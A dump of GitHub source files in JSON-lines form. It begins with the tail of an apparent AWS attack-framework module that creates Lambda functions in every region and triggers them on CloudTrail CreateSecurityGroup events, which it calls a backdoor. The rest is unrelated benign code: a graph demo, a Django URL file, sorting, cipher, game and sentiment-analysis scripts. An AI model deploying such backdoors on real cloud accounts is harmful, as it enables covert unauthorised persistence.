open('./modules/{}/lambda_function.zip'.format(technique_info['name']), 'rb') as f:\n zip_file_bytes = f.read()\n\n for region in regions:\n print('Starting region {}...'.format(region))\n client = awsattack_main.get_boto3_client('lambda', region)\n\n try:\n function_name = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(15))\n response = client.create_function(\n FunctionName=function_name,\n Runtime='python3.6',\n Role=target_role_arn,\n Handler='lambda_function.lambda_handler',\n Code={\n 'ZipFile': zip_file_bytes\n }\n )\n lambda_arn = response['FunctionArn']\n print(' Created Lambda function: {}'.format(function_name))\n data['functions_created'] += 1\n created_resources['LambdaFunctions'].append('{}@{}'.format(function_name, region))\n\n client = awsattack_main.get_boto3_client('events', region)\n\n response = client.put_rule(\n Name=function_name,\n EventPattern='{\"source\":[\"aws.ec2\"],\"detail-type\":[\"AWS API Call via CloudTrail\"],\"detail\":{\"eventSource\":[\"ec2.amazonaws.com\"],\"eventName\":[\"CreateSecurityGroup\"]}}',\n State='ENABLED'\n )\n print(' Created CloudWatch Events rule: {}'.format(response['RuleArn']))\n data['rules_created'] += 1\n\n client = awsattack_main.get_boto3_client('lambda', region)\n\n client.add_permission(\n FunctionName=function_name,\n StatementId=''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10)),\n Action='lambda:InvokeFunction',\n Principal='events.amazonaws.com',\n SourceArn=response['RuleArn']\n )\n\n client = awsattack_main.get_boto3_client('events', region)\n\n response = client.put_targets(\n Rule=function_name,\n Targets=[\n {\n 'Id': '0',\n 'Arn': lambda_arn\n }\n ]\n )\n if response['FailedEntryCount'] > 0:\n print('Failed to add the Lambda function as a target to the CloudWatch rule. Failed entries:')\n print(response['FailedEntries'])\n else:\n print(' Added Lambda target to CloudWatch Events rule.')\n data['successes'] += 1\n created_resources['CWERules'].append('{}@{}'.format(function_name, region))\n except ClientError as error:\n code = error.response['Error']['Code']\n if code == 'AccessDeniedException':\n print(' FAILURE: MISSING NEEDED PERMISSIONS')\n else:\n print(code)\n\n if created_resources['LambdaFunctions']:\n with open('./modules/{}/created-lambda-functions.txt'.format(technique_info['name']), 'w+') as f:\n f.write('\\n'.join(created_resources['LambdaFunctions']))\n if created_resources['CWERules']:\n with open('./modules/{}/created-cloudwatch-events-rules.txt'.format(technique_info['name']), 'w+') as f:\n f.write('\\n'.join(created_resources['CWERules']))\n\n print('Warning: Your backdoor will not execute if the account does not have an active CloudTrail trail in the region it was deployed to.')\n\n return data\n\n\n","repo_name":"blackbotsecurity/AWS-Attack","sub_path":"ttp/src/lambda_backdoor_new_sec_groups_src.py","file_name":"lambda_backdoor_new_sec_groups_src.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"95"} +{"seq_id":"15647143382","text":"#!/bin/sh\n\n\"\"\":\"\nexec python $0 ${1+\"$@\"}\n\"\"\"\n\n# ---------------------- HelloBlt.py ----------------------\n# \n# This program demonstrates more basic functionality like \n# making buttons to control showing of symbols, grids etc.\n# The example also shows how to make animated graphs and \n# how to plot the graphs more or less smooth.\n# \n\nfrom tkinter import * # The Tk package\nimport Pmw # The Python MegaWidget package\nimport math # import the sin-function\n\n\ndef animate():\n # This function is completely pointless, but demonstrates\n # that it's easy to update a graph \"runtime\".\n\n for t in range(31): # In 31 steps...\n for c in range(ncurves): # ...on each curve\n for x in range(npoints): # on each point...\n vector_y[c][x] = math.sin(c*x*0.5 +math.pi*t/15)\n\n master.after(20) # wait 0.02 second\n master.update_idletasks() # update screen\n\ndef symbolsOnOff():\n global symbols\n symbols = not symbols\n\n for curvename in g.element_show():\n if symbols:\n g.element_configure(curvename, symbol='diamond')\n else:\n g.element_configure(curvename, symbol='')\n \n\ndef smooth():\n global smoothing\n \n if smoothing == 'linear': smoothing='quadratic'\n elif smoothing == 'quadratic': smoothing='natural'\n elif smoothing == 'natural': smoothing='step'\n else: smoothing = 'linear'\n\n for curvename in g.element_show():\n g.element_configure(curvename, smooth=smoothing)\n\n\nmaster = Tk() # build Tk-environment\nncurves = 4 # draw 4 curves\nnpoints = 7 # use 8 points on each curve\n\nsmoothing='linear'\nsymbols = 0\n\n# In this example we use Pmw.Blt.Vectors. These can mostly be used like \n# a normal list, but changes will be updated in the graph automatically.\n# Using Pmw.Blt.Vectors is often slower, but in this case very convenient.\nvector_x = Pmw.Blt.Vector() \nvector_y = []\n\nfor y in range(ncurves):\n vector_y.append(Pmw.Blt.Vector()) # make vector for y-axis\n\nfor x in range(npoints): # for each point...\n vector_x.append(x*0.1) # make an x-value\n\n # fill vectors with cool graphs\n for c in range(ncurves): # for each curve...\n vector_y[c].append(math.sin(c*x*0.5)) # make an y-value\n\ng = Pmw.Blt.Graph(master) # make a new graph area\ng.pack(expand=1, fill='both')\n\ncolor = ['red', '#ff9900', 'blue', '#00cc00', 'black', 'grey']\n\nfor c in range(ncurves): # for each curve...\n curvename = 'sin(' + str(c) +'x)' # make a curvename\n g.line_create(curvename, # and create the graph\n xdata=vector_x, # with x data,\n ydata=vector_y[c], # and y data\n color=color[c], # and a color\n dashes=0, # and no dashed line\n linewidth=2, # and 2 pixels wide\n symbol='') # ...and no disks\n \ng.configure(title='Hello BLT World') # enter a title\n \n# make s row of buttons\nbuttons = Pmw.ButtonBox(master, labelpos='n', label_text='Options')\nbuttons.pack(fill='both', expand=1, padx=10, pady=10)\n\nbuttons.add('Grid', command=g.grid_toggle)\nbuttons.add('Symbols', command=symbolsOnOff)\nbuttons.add('Smooth', command=smooth)\nbuttons.add('Animate', command=animate)\nbuttons.add('Quit', command=master.quit)\n\nmaster.mainloop() # ...and wait for input\n\n\n","repo_name":"Kara-Tenpas-Akin/P19420","sub_path":"Other/Examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26215658505","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 8 17:50:49 2020\n\n@author: RohitSharma\n\"\"\"\n\n\t\n\n\ndef segment(text, segs):\n words = []\n last = 0\n for i in range(len(segs)):\n if segs[i] == '1':\n words.append(text[last:i+1])\n last=i+1\n words.append(text[last:])\n return words\n","repo_name":"rohitk12r/experiment","sub_path":"AI-Research-Python/nltktext.py","file_name":"nltktext.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"29479467785","text":"import os\nimport glob\n\nOPENPOSE_OUTPUT_DIR_NAME = \"keypoints\"\nDEEPSORT_OUTPUT_DIR_NAME = \"ID\"\nVIDEO_TYPES = [\"mp4\", \"avi\", \"MTS\", \"mov\", \"webm\", \"flv\"]\n\n\ndef find_video_paths_in_directory(dir_path: str) -> list[str]:\n video_paths: list[str] = []\n for VIDEO_TYPE in VIDEO_TYPES:\n video_paths.extend(glob.glob(os.path.join(dir_path, f\"*{VIDEO_TYPE}\")))\n return video_paths\n\n\nos.chdir(os.path.dirname(__file__))\ninput_paths = find_video_paths_in_directory(\n os.path.join(os.path.dirname(__file__), \"inputs\")\n)\n\nif not input_paths:\n input(\"動画が見つかりません. inputsフォルダに動画を配置してください. \\nキーを入力すると終了します.\")\n exit()\n\ncontainer_input_paths = [\n f\"/app/inputs/{os.path.basename(path)}\" for path in input_paths\n]\n\nfor container_input_path in container_input_paths:\n video_name = os.path.splitext(os.path.basename(container_input_path))[0]\n container_out_dir = f\"/app/outputs/{video_name}\"\n\n # OPENPOSE\n os.makedirs(\n os.path.join(\n os.path.dirname(__file__), \"outputs\", video_name, OPENPOSE_OUTPUT_DIR_NAME\n ),\n exist_ok=True,\n )\n os.system(\n f'docker compose run --rm openpose /bin/bash -c \"./build/examples/openpose/openpose.bin --video {container_input_path} --render_pose 0 --display 0 --write_json {container_out_dir}/{OPENPOSE_OUTPUT_DIR_NAME}\"'\n )\n\n # DEEPSORT\n os.makedirs(\n os.path.join(\n os.path.dirname(__file__), \"outputs\", video_name, DEEPSORT_OUTPUT_DIR_NAME\n ),\n exist_ok=True,\n )\n os.system(\n f'docker compose run --rm deepsort /bin/bash -c \"python object_tracker.py --video {container_input_path} --info {container_out_dir}/{DEEPSORT_OUTPUT_DIR_NAME} --dont_show --count\"'\n )\n","repo_name":"kou1046/lab-project","sub_path":"submodules/modules_starter.py","file_name":"modules_starter.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33099147847","text":"\"\"\"\nSharePastes\n\nHelps you quickly share code snippets via various services like Github Gist and\nPasteBin.com.\n\"\"\"\n\nfrom .core import BaseSharePastes\nfrom .core import Config\nfrom .core import SharePastesFactory\n\nextensions = {\n 'gist': ('gist', 'Gist'),\n 'pastebin': ('pastebin', 'Pastebin'),\n 'mozpastebin': ('mozpastebin', 'MozPastebin'),\n}\n\n__author__ = \"Vaidik Kapoor <kapoor.vaidik@gmail.com>\"\n__license__ = \"MIT\"\n__version__ = \".\".join(map(str, (0, 2, 0)))\n","repo_name":"vaidik/sharepastes","sub_path":"sharepastes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"95"} +{"seq_id":"70894359993","text":"import sys\nclass Solution:\n \"\"\"\n @param: nums: A list of integers\n @return: A list of integers includes the index of the first number and the index of the last number\n \"\"\"\n def subarraySumClosest(self, nums):\n # write your code here\n preSum = [(0,-1)]\n for i, num in enumerate(nums):\n preSum.append((preSum[-1][0]+num, i))\n \n preSum.sort()\n \n mindiff, res = sys.maxsize, []\n for i in range(1, len(preSum)):\n if mindiff > abs(preSum[i][0]-preSum[i-1][0]) :\n start = min(preSum[i][1], preSum[i-1][1])+1 \n end = max(preSum[i][1], preSum[i-1][1])\n res = [start,end]\n mindiff = abs(preSum[i][0]-preSum[i-1][0])\n \n return res\n\nnums=[-3,1,1,-3,5]\ntest = Solution()\nres = test.subarraySumClosest(nums)\nprint(res)\n","repo_name":"shujuan/leetcode","sub_path":"python/subarray_sum_closest.py","file_name":"subarray_sum_closest.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71740892474","text":"import re\n\nCOURSE_REGEX_PATTERN = \"([0-9]{2}-[0-9]{3})\\s+(\\w+)\\s+\\'([0-9]{2})\\s+\"\\\n \"([\\w+|\\*])\\s+([0-9]+\\.[0])\"\ncourse_regex = re.compile(COURSE_REGEX_PATTERN)\n\n\ndef parse_audit(audit):\n lines = audit.split(\"\\n\")\n\n courses_taken = []\n\n for line in lines:\n match = course_regex.search(line)\n if match:\n [course_id, season, year, grade, unit] = match.groups()\n courses_taken.append({\n \"course_id\": course_id,\n \"season\": season,\n \"year\": year,\n \"grade\": grade,\n \"unit\": unit\n })\n\n return courses_taken\n","repo_name":"ErrHu/15221-finalproject","sub_path":"audit/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"22863471964","text":"money_1lv = int(input())\nmoney_2lv = int(input())\nmoney_5lv = int(input())\nneeded_sum = int(input())\n\nfor leva01 in range(money_1lv + 1):\n for leva02 in range(money_2lv + 1):\n for leva05 in range(money_5lv + 1):\n if ((leva01 * 1) + (leva02 * 2) + (leva05 * 5)) == needed_sum:\n print(f\"{leva01} * 1 lv. + {leva02} * 2 lv. + {leva05} * 5 lv. = {needed_sum} lv.\")\n","repo_name":"qceka88/Basic-Python-May","sub_path":"06Nested_Loops/nested loops- more excersices/10profit.py","file_name":"10profit.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"95"} +{"seq_id":"26623723488","text":"'''\nImplementation of Merge Sort\n06/24/2018\n\nDo NOT return an array every time and then combine them.\nUse an empty and write the result into it to save space complexity.\n'''\n\ndef mergeSort(arr):\n\tif not len(arr):\n\t\treturn []\n\telse:\n\t\tresult = [0] * len(arr)\n\t\tsplit(arr, 0, len(arr) - 1, result)\n\t\treturn arr\n\ndef split(arr, low, high, result):\n\t#single element, return do not change anything\n\tif low >= high:\n\t\treturn\n\t#multiple element, continue\n\telse:\n\t\tmid = (low + high) // 2\n\t\tsplit(arr, low, mid, result)\n\t\tsplit(arr, mid + 1, high, result)\n\t\tmerge(arr, low, mid, high, result)\n\n\t\tfor i in range(low, high + 1):\n\t\t\tarr[i] = result[i]\n\n\tprint(\"low: {}, high: {}, result: {}\".format(low, high, result))\n\ndef merge(arr, low, mid, high, result):\n\ti = low\n\tj = mid + 1\n\tcount = low\t\n\n\twhile i <= mid and j <= high:\n\t\tif arr[i] < arr[j]:\n\t\t\tresult[count] = arr[i]\n\t\t\ti += 1\n\t\telse:\n\t\t\tresult[count] = arr[j]\n\t\t\tj += 1\n\t\tcount += 1\n\n\twhile i <= mid:\n\t\tresult[count] = arr[i]\n\t\tcount += 1\n\t\ti += 1\n\n\twhile j <= high:\n\t\tresult[count] = arr[j]\n\t\tcount += 1\n\t\tj += 1\n\n\nif __name__ == \"__main__\":\n\tinputList = input('Please enter a list of integers separated by comma(,): ')\n\tarr = [int(num) for num in inputList.split(',')]\n\tprint(\"The sorted result is {}\".format(mergeSort(arr)))","repo_name":"patrichu/CtCI-Exercises","sub_path":"00.Basic_Data_Structure_and_Algorithms/Sortings/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18604136774","text":"from django.urls import path\nfrom .views import (\n EventListCreateView, \n EventRetrieveUpdateDestroyView, \n EventUserListCreateView,\n EventUserRetrieveUpdateDestroyView,\n SongRequestListView,\n SongRequestUpvoteView,\n SongRequestDeleteView,\n SongRequestCreateView,\n JoinEventByPIN,\n)\n\nurlpatterns = [\n path('', EventListCreateView.as_view(), name='event-list-create'), \n path('<int:pk>/', EventRetrieveUpdateDestroyView.as_view(), name='event-retrieve-update-destroy'), \n path('users/', EventUserListCreateView.as_view(), name='event-user-list-create'), \n path('users/<int:pk>/', EventUserRetrieveUpdateDestroyView.as_view(), name='event-user-retrieve-update-destroy'),\n path('song-requests/', SongRequestListView.as_view(), name='song-request-list-create'),\n path('song-requests/<int:pk>/', SongRequestDeleteView.as_view(), name='song-request-delete'),\n path('song-requests/create/', SongRequestCreateView.as_view(), name='song-request-create'),\n path('song-requests/<int:pk>/upvote/', SongRequestUpvoteView.as_view(), name='song-request-upvote'),\n path('join/', JoinEventByPIN.as_view(), name='join-event-by-pin'),\n]\n","repo_name":"NoahRamones/Kyoo","sub_path":"backend/KyooBackend/backend/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72451671033","text":"from django.conf.urls import url, include\nfrom . import views\n\n\napp_name = 'positions'\nurlpatterns = [\n url(r'^overview/$', views.PositionListView.as_view(), name='index'),\n url(r'^add/$', views.add_position, name='add-position'),\n url(r'^(?P<pk>\\d+)-(?P<slug>[-\\w\\d]+)/', include([\n url(r'^detail/$', views.PositionDetailView.as_view(), name='position-detail'),\n url(r'^edit/$', views.edit_position, name='edit-position'),\n url(r'^delete/$', views.delete_position, name='delete-position'),\n ])),\n]\n","repo_name":"dsawali/Co-Up","sub_path":"coup/positions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18252456937","text":"class Solution:\n def hammingDistance(self, x, y):\n \"\"\"\n :type x: int\n :type y: int\n :rtype: int\n \"\"\"\n a = \"{0:031b}\".format(x)\n b = \"{0:031b}\".format(y)\n\n diff = 0\n print(a, b)\n for i, j in zip(a, b):\n print(i, j)\n if i != j:\n diff += 1\n\n return diff\n\n \ns = Solution()\n\nx, y = 1, 2\nprint(s.hammingDistance(x, y))\n\n\n","repo_name":"desertSniper87/monorepo","sub_path":"leetcode/hamming-distance.py","file_name":"hamming-distance.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"22793443247","text":"#\n# CAESAR CIPHER - PART 1\n# The basic cipher\n#\n# Standard Caesar Cipher where the user adds a message and cipher key\n# The message is encoded according to the key in relation to the alphabet\n#\n# There are some obvious issues with this cipher. What are they?\n#\n#\n\nalphabet = 'abcdefghijklmnopqrstuvwxyz' # The alphabet which the cypher will use for encoding\nnewMessage = '' # Initialise the message variable\n\nmessage = input('Please enter a messsage: ')\n# The key is the number of steps along the alphabet the program will step \n# when encrypting the message. A key of 3 for example would turn the letter\n# 'c' into 'f'\ntheKey = int(input('Please enter your key: ')) \n\nfor character in message:\n if character in alphabet:\n position = alphabet.find(character)\n newPosition = (position + theKey)%26\n newCharacter = alphabet[newPosition]\n newMessage += newCharacter\n else:\n newMessage += character # line to handle a character which isn't in the alphabet variable\n\nprint('Your new message is: ', newMessage)\n","repo_name":"SheyMouse/caesar-cipher","sub_path":"caesarcipher_01.py","file_name":"caesarcipher_01.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"26254383661","text":"import game_framework\nfrom pico2d import *\n\nfrom load_map import map_list\n\n# Boy Run Speed\nPIXEL_PER_METER = (10.0 / 0.3)\nRUN_SPEED_KMPH = 40.0\nRUN_SPEED_MPM = (RUN_SPEED_KMPH * 1000.0/60.0)\nRUN_SPEED_MPS = (RUN_SPEED_MPM / 60.0)\nRUN_SPEED_PPS = (RUN_SPEED_MPS * PIXEL_PER_METER)\n\n# Boy Action Speed\n# fill expressions correctly\nTIME_PER_ACTION = 0.5\nACTION_PER_TIME = 1.0 / TIME_PER_ACTION\nFRAMES_PER_ACTION = 8\n\n# John Event\nRIGHT_DOWN, LEFT_DOWN, RIGHT_UP, LEFT_UP, UP_DOWN, UP_UP = range(6)\n\nkey_event_table = {\n (SDL_KEYDOWN, SDLK_RIGHT): RIGHT_DOWN,\n (SDL_KEYDOWN, SDLK_LEFT): LEFT_DOWN,\n (SDL_KEYUP, SDLK_RIGHT): RIGHT_UP,\n (SDL_KEYUP, SDLK_LEFT): LEFT_UP,\n (SDL_KEYDOWN, SDLK_UP): UP_DOWN,\n (SDL_KEYUP, SDLK_UP): UP_UP\n}\n\ngravity = 0.03\n\n\ndef blk(y, x):\n # left,up,right,down\n return 120*x, 1080-120*y, 120*(x+1), 960 - 120*y\n\n\n# John States\nclass IdleState:\n\n @staticmethod\n def enter(John, event):\n if event == RIGHT_DOWN:\n John.velocity += RUN_SPEED_PPS\n elif event == LEFT_DOWN:\n John.velocity -= RUN_SPEED_PPS\n elif event == RIGHT_UP:\n John.velocity -= RUN_SPEED_PPS\n elif event == LEFT_UP:\n John.velocity += RUN_SPEED_PPS\n elif event == UP_DOWN:\n if John.y2 == John.y:\n John.jump = 4.0\n elif event == UP_UP:\n if John.jump > 0.0:\n John.jump = 0.0\n\n @staticmethod\n def exit(John, event):\n # fill here\n pass\n\n @staticmethod\n def do(John):\n John.y2 = John.y\n John.frame = (John.frame + FRAMES_PER_ACTION*ACTION_PER_TIME*game_framework.frame_time) % 8\n John.y = John.y + John.jump\n #John.y = clamp(150.0, John.y, 1200.0)\n John.jump = John.jump - gravity*game_framework.frame_time\n John.jump = clamp(-30.0, John.jump, 4.0)\n John.left, John.up, John.right, John.down = John.x - 15, John.y + 30, John.x + 15, John.y - 30\n\n for i in range(0,9):\n for j in range(0,16):\n if map_list[i][j] == 1:\n left, up, right, down = blk(i, j)\n # UP collision check\n if John.up > down and John.up < up:\n if John.right > left and John.right < right or \\\n John.left < right and John.left > left:\n John.y = John.y2\n John.jump = 0.0\n # DOWN collision check\n elif John.down < up and John.up > up:\n if John.right > left and John.right < right or \\\n John.left < right and John.left > left:\n John.y = John.y2\n John.jump = 0.0\n # LEFT collision check\n if John.left < right and John.left > left:\n if John.up > down and John.up < up or \\\n John.down < up and John.down > down:\n John.x = John.x2\n # RIGHT collision check\n elif John.right > left and John.right < right:\n if John.up > down and John.up < up or \\\n John.down < up and John.down > down:\n John.x = John.x2\n\n\n\n\n @staticmethod\n def draw(John):\n if John.dir == 1:\n John.image.clip_draw(int(John.frame) * 100, 300, 100, 100, John.x, John.y)\n else:\n John.image.clip_draw(int(John.frame) * 100, 200, 100, 100, John.x, John.y)\n\n\nclass RunState:\n\n @staticmethod\n def enter(John, event):\n if event == RIGHT_DOWN:\n John.velocity += RUN_SPEED_PPS\n elif event == LEFT_DOWN:\n John.velocity -= RUN_SPEED_PPS\n elif event == RIGHT_UP:\n John.velocity -= RUN_SPEED_PPS\n elif event == LEFT_UP:\n John.velocity += RUN_SPEED_PPS\n elif event == UP_DOWN:\n if John.y2 == John.y:\n John.jump = 4.0\n elif event == UP_UP:\n if John.jump > 0.0:\n John.jump = 0.0\n John.dir = John.velocity\n John.dir = clamp(-1, John.velocity, 1)\n\n @staticmethod\n def exit(John, event):\n pass\n\n @staticmethod\n def do(John):\n John.y2 = John.y\n John.x2 = John.x\n John.frame = (John.frame + FRAMES_PER_ACTION*ACTION_PER_TIME*game_framework.frame_time) % 8\n John.x += John.velocity * game_framework.frame_time\n John.x = clamp(25, John.x, 1920 - 25)\n John.y += John.jump\n #John.y = clamp(150.0, John.y, 1200.0)\n John.jump -= gravity\n John.jump = clamp(-30.0, John.jump, 4.0)\n John.left, John.up, John.right, John.down = John.x - 15, John.y + 30, John.x + 15, John.y - 30\n\n for i in range(0, 9):\n for j in range(0, 16):\n if map_list[i][j] == 1:\n left, up, right, down = blk(i, j)\n # UP collision check\n if John.up > down and John.up < up:\n if John.right > left and John.right < right or \\\n John.left < right and John.left > left:\n John.y = John.y2\n John.jump = 0.0\n # DOWN collision check\n elif John.down < up and John.up > up:\n if John.right > left and John.right < right or \\\n John.left < right and John.left > left:\n John.y = John.y2\n John.jump = 0.0\n # LEFT collision check\n if John.left < right and John.left > left:\n if John.up > down and John.up < up or \\\n John.down < up and John.down > down:\n John.x = John.x2\n # RIGHT collision check\n elif John.right > left and John.right < right:\n if John.up > down and John.up < up or \\\n John.down < up and John.down > down:\n John.x = John.x2\n\n\n @staticmethod\n def draw(John):\n if John.dir == 1:\n John.image.clip_draw(int(John.frame) * 100, 100, 100, 100, John.x, John.y)\n else:\n John.image.clip_draw(int(John.frame) * 100, 0, 100, 100, John.x, John.y)\n\n\nnext_state_table = {\n IdleState: {RIGHT_UP: RunState, LEFT_UP: RunState, RIGHT_DOWN: RunState, LEFT_DOWN: RunState, UP_DOWN: IdleState,\n UP_UP: IdleState},\n RunState: {RIGHT_UP: IdleState, LEFT_UP: IdleState, LEFT_DOWN: IdleState, RIGHT_DOWN: IdleState, UP_DOWN: RunState,\n UP_UP: RunState}\n}\n\n\nclass John:\n\n def __init__(self):\n self.x, self.y = 100, 300\n self.x2, self.y2 = 100, 300\n self.left, self.up, self.right, self.down = self.x - 15, self.y + 30, self.x +15, self.y - 30\n self.image = load_image('animation_sheet.png')\n self.dir = 1\n self.velocity = 0\n self.frame = 0\n self.jump = 0\n self.jump_toggle = True\n self.event_que = []\n self.cur_state = IdleState\n self.cur_state.enter(self, None)\n\n def add_event(self, event):\n self.event_que.insert(0, event)\n\n def update(self):\n self.cur_state.do(self)\n if len(self.event_que) > 0:\n event = self.event_que.pop()\n self.cur_state.exit(self, event)\n self.cur_state = next_state_table[self.cur_state][event]\n self.cur_state.enter(self, event)\n\n def draw(self):\n self.cur_state.draw(self)\n\n def handle_event(self, event):\n if (event.type, event.key) in key_event_table:\n key_event = key_event_table[(event.type, event.key)]\n self.add_event(key_event)","repo_name":"JaeHwi-Kwon/2DGP","sub_path":"2DGP 게임 프로젝트/John.py","file_name":"John.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16328558178","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jul 12 19:00:05 2021\r\n\r\n@author: MRITYUNJAY\r\nSentimental Analysis on ISEGlobal\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('finalData.csv')\r\ndata.columns\r\ndata.drop('Unnamed: 0', inplace = True, axis = 1)\r\ndata.groupby('Platform').describe()\r\ndata\r\ndata.drop_duplicates(keep = 'first', inplace = True, ignore_index = True)\r\n\r\n#Converting to lower text\r\nclean_text = [i.lower() for i in data['Content (Reviews and Tweets)']]\r\n\r\n\r\n#Tokenize\r\n#sentence tokenize\r\nfrom nltk.tokenize import sent_tokenize, word_tokenize\r\nimport nltk\r\nsent_tok = []\r\nfor sent in clean_text:\r\n sent = sent_tokenize(sent)\r\n sent_tok.append(sent)\r\nsent_tok\r\n\r\n#word tokenize\r\nclean_text_2 = [word_tokenize(i) for i in clean_text]\r\nclean_text_2\r\n\r\n#remove punctuations\r\nimport re\r\nclean_text_3 = []\r\nfor words in clean_text_2:\r\n clean = []\r\n for word in words:\r\n res = re.sub(r'[^\\w\\s]', \"\", word)\r\n if(res != \"\"):\r\n clean.append(res)\r\n clean_text_3.append(clean)\r\nclean_text_3\r\n\r\n#remove Stopwords\r\nnltk.download('stopwords')\r\nfrom nltk.corpus import stopwords\r\n\r\nclean_text_4 = []\r\nfor words in clean_text_3:\r\n clean = []\r\n for word in words:\r\n if not word in stopwords.words('english'):\r\n clean.append(word)\r\n clean_text_4.append(clean)\r\nclean_text_4\r\n\r\n#Stemming - removing the ings, ed, s etc to bring word back to its root form\r\nfrom nltk.stem.snowball import SnowballStemmer\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nnltk.download('wordnet')\r\nlemma = WordNetLemmatizer()\r\nstemm = SnowballStemmer('english')\r\n\r\n#Just showing uses for my own sake\r\na = [stemm.stem(i) for i in ['reading', 'washing', 'driving', 'drive']]\r\nb = [lemma.lemmatize(i, 'v') for i in ['reading', 'washing', 'driving', 'cooking']] \r\nb\r\n\r\nclean_text_5 = []\r\nfor words in clean_text_4:\r\n clean = []\r\n for word in words:\r\n w_stemmed = stemm.stem(word)\r\n clean.append(w_stemmed)\r\n clean_text_5.append(clean)\r\n \r\nclean_text_5\r\n\r\n#Lemmatization\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nnltk.download('wordnet')\r\nlemma = WordNetLemmatizer()\r\n\r\nlem = []\r\nfor words in clean_text_4:\r\n clean = []\r\n for word in words:\r\n w_lemma = lemma.lemmatize(word)\r\n clean.append(w_lemma)\r\n lem.append(clean)\r\nlem\r\n\r\n#Vectorization\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\ncv = CountVectorizer(ngram_range=(1,2))\r\nX_vec = [cv.fit_transform(i).toarray() for i in lem]\r\nX_vec\r\nprint(cv.get_feature_names())\r\n\r\n#Get Test Value.. Similarily perform Vectorization on that value.\r\n\r\n#Sentiment Ananlysis\r\n\r\n#!pip install vaderSentiment textblob\r\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\r\nfrom textblob import TextBlob\r\nlem\r\n\r\n#Using TextBlob\r\nanalysis = [TextBlob(i) for i in data['Content (Reviews and Tweets)']]\r\nanalysis\r\nanalysis[0].tags\r\nsentiment_1 = [i.sentiment for i in analysis]\r\ndata['Content (Reviews and Tweets)'][0]\r\npolarity = [i.polarity for i in sentiment_1]\r\nsubjectivity = [i.subjectivity for i in sentiment_1]\r\npolarity, subjectivity\r\nsentiment_data = data \r\nlen(polarity)\r\nlen(subjectivity)\r\ndata['polarity'] = polarity\r\ndata['subjectivity'] = subjectivity \r\npd.set_option('max_rows', 25)\r\ndata[['Content (Reviews and Tweets)', 'polarity']].groupby('polarity').head(25)\r\ndata[data['polarity'] < 0]['Content (Reviews and Tweets)'].tail(25)\r\ndata.to_csv('TextBlobSentiment.csv')\r\n\r\nsm = SentimentIntensityAnalyzer()\r\nsentiment = [TextBlob.sentiment(i) for i in lem]\r\n\r\n#Using VaderSentiment\r\nvader = SentimentIntensityAnalyzer()\r\nanalysis = [vader.polarity_scores(i) for i in data['Content (Reviews and Tweets)']]\r\ndf_analysis = pd.DataFrame(analysis)\r\ndt_new = pd.concat([data, df_analysis], axis=1)\r\ndt_new.to_csv('ISELVaderAnalysis.csv')\r\n\r\n\r\nthreshhold = 0.5\r\n\r\ndef emotion_detect(field):\r\n sentiment = []\r\n for i in field:\r\n if i >= threshhold :\r\n sentiment.append(\"Positive\")\r\n elif i <= - threshhold :\r\n sentiment.append(\"Negative\")\r\n else :\r\n sentiment.append(\"Neutral\")\r\n return sentiment\r\n \r\ndt_new['Sentiment'] = emotion_detect(dt_new['compound'])\r\ndt_new.to_csv('ISELVaderAnalysis.csv')\r\n\r\ndef top_n_reviews(df, data_column, number_of_rows, type_of_review):\r\n print(f\"Top {type_of_review} Comments:\")\r\n for index, row in df.nlargest(number_of_rows, data_column).iterrows():\r\n print(f\"Score: {row[data_column]}, Review: {row[1]}\")\r\n \r\n\r\ntop_n_reviews(dt_new, 'pos', 15, \"Positive\")\r\ntop_n_reviews(dt_new, 'neg', 15, \"Negative\" ) \r\n\r\n#what are the courses available\r\nise = pd.read_csv('iselglobal_website.csv')\r\nise.columns\r\ncourses = ise['rv-course 2'].unique()\r\ncourses = courses[~pd.isnull(courses)]\r\ncourses = list(courses)\r\ncourses = [i.lower() for i in courses]\r\ncourses\r\ncourses = 